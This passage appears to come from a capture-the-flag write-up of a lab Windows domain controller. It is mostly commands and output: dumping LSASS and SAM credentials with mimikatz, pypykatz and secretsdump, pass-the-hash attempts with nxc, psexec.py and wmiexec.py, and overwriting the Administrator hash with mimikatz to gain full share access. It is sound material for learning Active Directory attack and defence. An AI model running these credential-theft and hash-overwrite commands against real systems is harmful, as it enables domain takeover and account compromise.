[*] Opening SVCManager on 10.10.10.192.....
[*] Creating service ChCQ on 10.10.10.192.....
[*] Starting service ChCQ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1397]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
LSASS vs History
The Administrator’s NTHash from the local the LSASS is:
jamarir@kali:~$ pypykatz lsa minidump lsass.DMP |grep -vP '^[\S]+\s*|\s+?.*? ?(None|\(hex\)|:\s*)$'
PS C:\Users\jamarir> mimikatz.exe "sekurlsa::minidump lsass.DMP" "sekurlsa::logonpasswords" "exit" |Select-String -NotMatch '^.*\(null\)|^\s*\w+\s+:\s*$'
[...]
Authentication Id : 0 ; 153705 (00000000:00025869)
Session : Interactive from 1
User Name : Administrator
Domain : BLACKFIELD
Logon Server : DC01
Logon Time : 23/02/2020 18:59:04
SID : S-1-5-21-4194615774-2175524697-3563712290-500
[00000003] Primary
* Username : Administrator
* Domain : BLACKFIELD
* NTLM : 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
* SHA1 : db5c89a961644f0978b4b69a4d2a2239d7886368
* DPAPI : 240339f898b6ac4ce3f34702e4a89550
However, the LSASS’s NTHash isn’t allowed against SMB, thus over PsExec:
jamarir@kali:~$ nxc smb 10.10.10.192 -u 'Administrator' -H '7f1e4ff8c6a8e6b6fcae2d9c0572cd62' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [-] BLACKFIELD.local\Administrator:7f1e4ff8c6a8e6b6fcae2d9c0572cd62 STATUS_LOGON_FAILURE
jamarir@kali:~$ psexec.py -hashes ':7f1e4ff8c6a8e6b6fcae2d9c0572cd62' 'BLACKFIELD.LOCAL/Administrator@10.10.10.192'
[-] SMB SessionError: code: 0xc000006d - STATUS_LOGON_FAILURE - The attempted logon is invalid. This is either due to a bad username or authentication information.
That't because this is an old password history hash (as shown in the NTDS’s outputs with Get-ADDBAccount or secretsdump.py -history, or the following Get-ADReplAccount's output (requires replication privilege on the DC)):
*Evil-WinRM* PS C:\windows\tasks> Get-ADReplAccount -SamAccountName Administrator -Server 'DC01.BLACKFIELD.local'
[...]
Secrets
NTHash: 184fb5e5178480be64824d4cd53b99ee
LMHash:
NTHashHistory:
Hash 01: 184fb5e5178480be64824d4cd53b99ee
Hash 02: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
Hash 03: ac2983b6afa7bdea9360fa7a95e31855
Hash 04: a47feb765cf90d3216423e9cfedea565
Hash 05: 24958cffdd2aa3125c63c3fd374db44b
LMHashHistory:
Hash 01: 9f5d55ddfdef1ad96c83f770bed89df3
Hash 02: b795d74a5f0181fd412a76c1600c8bfb
Hash 03: 885326d4dee15df39276657a555fb362
Hash 04: 226816c11a2502b73182332a62ff325f).
This password history is used, in particular, to prevent users from reusing old passwords.
SAM vs ¯\_(ツ)_/¯
The Administrator’s NTHash from the local SAM is:
*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save hklm\sam sam.hive
*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save hklm\system system.hive
*Evil-WinRM* PS C:\Users\svc_backup\Documents> ./mimikatz.exe "lsadump::sam /sam:sam.hive /system:system.hive" exit
jamarir@kali:~$ pypykatz registry --sam sam.hive system.hive
jamarir@kali:~$ secretsdump.py -sam sam.hive -system system.hive LOCAL
[...]
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:67ef902eae0d740df6257f273de75051:::
And again, we can’t access SMB, or PsExec, or WmiExec:
jamarir@kali:~$ nxc smb 10.10.10.192 -u 'Administrator' -H '67ef902eae0d740df6257f273de75051' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [-] BLACKFIELD.local\Administrator:67ef902eae0d740df6257f273de75051 STATUS_LOGON_FAILURE
jamarir@kali:~$ psexec.py -hashes ':67ef902eae0d740df6257f273de75051' 'BLACKFIELD.LOCAL/Administrator@10.10.10.192'
[-] SMB SessionError: code: 0xc000006d - STATUS_LOGON_FAILURE - The attempted logon is invalid. This is either due to a bad username or authentication information.
jamarir@kali:~$ wmiexec.py -hashes ':67ef902eae0d740df6257f273de75051' 'BLACKFIELD.LOCAL/Administrator@10.10.10.192'
[-] SMB SessionError: code: 0xc000006d - STATUS_LOGON_FAILURE - The attempted logon is invalid. This is either due to a bad username or authentication information.
I thought it was a UAC policy issue, which wasn’t unfortunately:
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'FilterAdministratorToken'
FilterAdministratorToken : 1
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies
PSChildName : System
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
*Evil-WinRM* PS C:\Users\Administrator\Documents> Set-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'FilterAdministratorToken' -Value 0
jamarir@kali:~$ nxc smb 10.10.10.192 -u 'Administrator' -H '67ef902eae0d740df6257f273de75051' --shares --local-auth
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:DC01) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [-] DC01\Administrator:67ef902eae0d740df6257f273de75051 STATUS_LOGON_FAILURE
But, when I force the Administrator’s NTHash update in the SAM database with Mimikatz, it magically works:
*Evil-WinRM* PS C:\Users\Administrator\Documents> ./mimikatz.exe "lsadump::setntlm /user:Administrator /ntlm:67ef902eae0d740df6257f273de75051" exit
[...]
mimikatz(commandline) # lsadump::setntlm /user:Administrator /ntlm:67ef902eae0d740df6257f273de75051
NTLM : 67ef902eae0d740df6257f273de75051
Target server:
Target user : Administrator
Domain name : BLACKFIELD
Domain SID : S-1-5-21-4194615774-2175524697-3563712290
User RID : 500
>> Informations are in the target SAM!
jamarir@kali:~$ nxc smb 10.10.10.192 -u 'Administrator' -H '67ef902eae0d740df6257f273de75051' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\Administrator:67ef902eae0d740df6257f273de75051 (Pwn3d!)
SMB 10.10.10.192 445 DC01 [*] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ READ,WRITE Remote Admin
SMB 10.10.10.192 445 DC01 C$ READ,WRITE Default share
SMB 10.10.10.192 445 DC01 forensic READ,WRITE Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON READ,WRITE Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL READ,WRITE Logon server share
Because it actually overwrote the NTDS’s NTHash (used for domain-based authentications)…
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ADDBAccount -DistinguishedName 'CN=Administrator,CN=Users,DC=BLACKFIELD,DC=local' -DBPath 'C:\Windows\Tasks\NTDS\Active Directory\ntds.dit' -BootKey (Get-BootKey -SystemHivePath 'C:\Windows\Tasks\NTDS\registry\SYSTEM')
DistinguishedName: CN=Administrator,CN=Users,DC=BLACKFIELD,DC=local
Sid: S-1-5-21-4194615774-2175524697-3563712290-500
Guid: 2118ae1a-b338-4308-9901-bb763a7c0e5b
SamAccountName: Administrator
SamAccountType: User
[...]
Owner: S-1-5-21-4194615774-2175524697-3563712290-512
Secrets
NTHash: 67ef902eae0d740df6257f273de75051
LMHash:
NTHashHistory:
Hash 01: 67ef902eae0d740df6257f273de75051
Hash 02: 184fb5e5178480be64824d4cd53b99ee
Hash 03: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
[...]
Is local authentication disabled on the DC ? Or is it not disabled over the network ?
¯\_(ツ)_/¯